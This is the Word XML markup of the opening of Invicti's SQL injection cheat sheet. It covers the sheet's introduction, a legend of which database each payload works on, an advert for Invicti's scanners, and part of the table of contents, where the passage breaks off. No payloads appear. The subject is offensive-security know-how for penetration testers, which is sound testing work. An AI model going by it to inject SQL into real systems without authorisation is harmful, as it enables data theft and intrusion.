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1CC8B1" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="65"/>
          <w:szCs w:val="65"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="65"/>
          <w:szCs w:val="65"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL injection cheat sheet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434BF196" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId5" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="5D40BD"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Ferruh Mavituna</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="537FE5AD" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:spacing w:after="0"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 - </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9B040C" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:spacing w:after="0"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October 20, 2015</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F73746" w14:textId="5FB07715" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:spacing w:after="0"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noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5594137B" wp14:editId="36C2868C">
                <wp:extent cx="304800" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="3" name="Rectangle 3" descr="https://cdn.prod.website-files.com/689c8d2a82b96fe8bd736742/68c284181123640664e6770f_Social%20logo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3B897" id="Rectangle 3" o:spid="_x0000_s1026" alt="https://cdn.prod.website-files.com/689c8d2a82b96fe8bd736742/68c284181123640664e6770f_Social%20logo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mWh55QcDAAAnBgAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwEC&#10;LQAUAAYACAAAACEATKDpLNgAAAADAQAADwAAAAAAAAAAAAAAAABhBQAAZHJzL2Rvd25yZXYueG1s&#10;UEsFBgAAAAAEAAQA8wAAAGYGAAAAAA==&#10;" filled="f" stroked="f">
                <o:lock v:ext="edit" aspectratio="t"/>
                <w10:anchorlock/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="54103618" w14:textId="625E8B4A" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:spacing w:after="0"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noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CBC445B" wp14:editId="4983DA67">
                <wp:extent cx="304800" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="2" name="Rectangle 2" descr="https://cdn.prod.website-files.com/689c8d2a82b96fe8bd736742/68c28425dec9220a321e796e_Social%20logo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00EDE" id="Rectangle 2" o:spid="_x0000_s1026" alt="https://cdn.prod.website-files.com/689c8d2a82b96fe8bd736742/68c28425dec9220a321e796e_Social%20logo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XVra/BgMAACcGAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQIt&#10;ABQABgAIAAAAIQBMoOks2AAAAAMBAAAPAAAAAAAAAAAAAAAAAGAFAABkcnMvZG93bnJldi54bWxQ&#10;SwUGAAAAAAQABADzAAAAZQYAAAAA&#10;" filled="f" stroked="f">
                <o:lock v:ext="edit" aspectratio="t"/>
                <w10:anchorlock/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF8235E" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1"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Use the Invicti SQL Injection Cheat Sheet to learn about exploiting different variants of the SQL injection vulnerability. The cheat sheet includes technical information and payloads for SQL injection attacks against MySQL, Microsoft SQL Server, Oracle and PostgreSQL database servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26718F2A" w14:textId="0335A541" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:spacing w:after="0"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noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D971566" wp14:editId="710FB8E9">
            <wp:extent cx="11430000" cy="6004560"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="Picture 1" descr="https://cdn.prod.website-files.com/68a4552adf4a460ade53ca38/69399104f4e7ef58ad507f7f_68d6809e02012f241c5432ac_sql-injection-cheat-shee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prod.website-files.com/68a4552adf4a460ade53ca38/69399104f4e7ef58ad507f7f_68d6809e02012f241c5432ac_sql-injection-cheat-sheet.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00" cy="6004560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8DF2B5"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r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>What is an SQL injection cheat sheet?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A4E949"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This SQL injection cheat sheet is a cybersecurity resource with detailed technical information and attack payloads to test for different types of </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>SQL injection (SQLi)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> vulnerabilities caused by insufficient user input validation and sanitization. This cheat sheet can be used as a reference for penetration testers but also as a general guide for anyone interested in web application security and all the unexpected things you can do with SQL commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46968623"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bookmarkStart w:id="0" w:name="about"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>About the Invicti SQL injection cheat sheet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A4C6DB"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This cheat sheet has been the web’s leading reference for SQL injection payloads ever since it was first published in 2015 on Netsparker. It is a living document in constant development and currently contains payloads and tips for MySQL, Microsoft SQL Server, Oracle, PostgreSQL, and SQLite. As with any cheat sheet, some examples might not work in every situation because injection in real live environments will vary depending on the server configuration, structured query language dialect, usage of parentheses, application framework, and unexpected, strange, and complex SQL statements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276D86BE"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Successful SQL injection often requires a payload tailored to a specific SQL database system. Payload usability is indicated as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD6EFEE" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E6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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> = works on MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BF4D2F" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E6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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> = works on SQL Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D00E81B" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E6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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> = works on PostgreSQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D51A17" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E6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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> = works on Oracle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1856CCBC" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E6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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> = works on SQLite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F8FCBF" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> = works on potentially other databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F050AEB"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When a payloads works on several database systems, you will see multiple symbols:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F80C9EA" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E6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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(MS)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> = works on MySQL and SQL Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACEE940" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E6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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(PO+)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> = works on PostgreSQL, Oracle, and possibly other databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED734E2" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:spacing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Automatically finding and exploiting SQL injection vulnerabilities with DAST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5114AD06"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This cheat sheet lists dozens of SQLi payloads and techniques but still only scratches the surface. Different types of attacks, SQL code variants, encoding options, values to try out to bypass filters—there’s no way anyone could cover all the combinations manually, which makes </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>DAST tools</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> (web vulnerability scanners) a vital part of any offensive or defensive application security toolbox.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213EA0D0"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lastRenderedPageBreak/>
        <w:t>DAST solutions such as Invicti and </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Acunetix by Invicti</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> can quickly and automatically test hundreds of SQLi attack variations with unique payload values to be sure that a specific application reaction indicates a true vulnerability. Covering in-band, out-of-band, and even boolean SQL injections, Invicti DAST tools not only identify vulnerabilities but can safely exploit many of them and present a proof of exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAC1909" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Learn how Invicti’s proof-based scanning works</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> and </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>get a demo</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> to see it in action!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3749676E"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bookmarkStart w:id="1" w:name="TOC"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Table of contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1611B5DD"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12" w:anchor="LineComments" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>SQL injection 101: Injecting comments to manipulate queries</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="407A9D07"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13" w:anchor="LineCommentAttacks" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Line comments</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3AE6E2CB"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14" w:anchor="InlineComments" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Inline comments</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="46976A00" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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15" w:anchor="InlineSamples" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Classic inline comment SQL injection attack samples</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="39CA5D30" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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16" w:anchor="MySQLInlineSamples" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>MySQL version detection sample attacks</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2365D674"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17" w:anchor="StackingQueries" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Stacking queries</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="14E0D5B8"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18" w:anchor="StackedSamples" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Stacked SQL injection attack samples</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1073A274"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19" w:anchor="IfStatements" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>If statements</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3F2BEEDE"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20" w:anchor="MySQLIf" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>MySQL If statement</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1377935E"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21" w:anchor="SQLServerIf" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>SQL Server If statement</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6D5D3305"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22" w:anchor="OracleIf" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Oracle If statement</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2B7B37A9"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23" w:anchor="PostgreSQLIf" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>PostgreSQL If statement</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="31131727"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24" w:anchor="SQLiteIf" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>SQLite If statement</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="446BF4F4"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25" w:anchor="SampleIfStatements" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>If statement SQL injection attack samples</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7CA120E9"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26" w:anchor="UsingIntegers" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
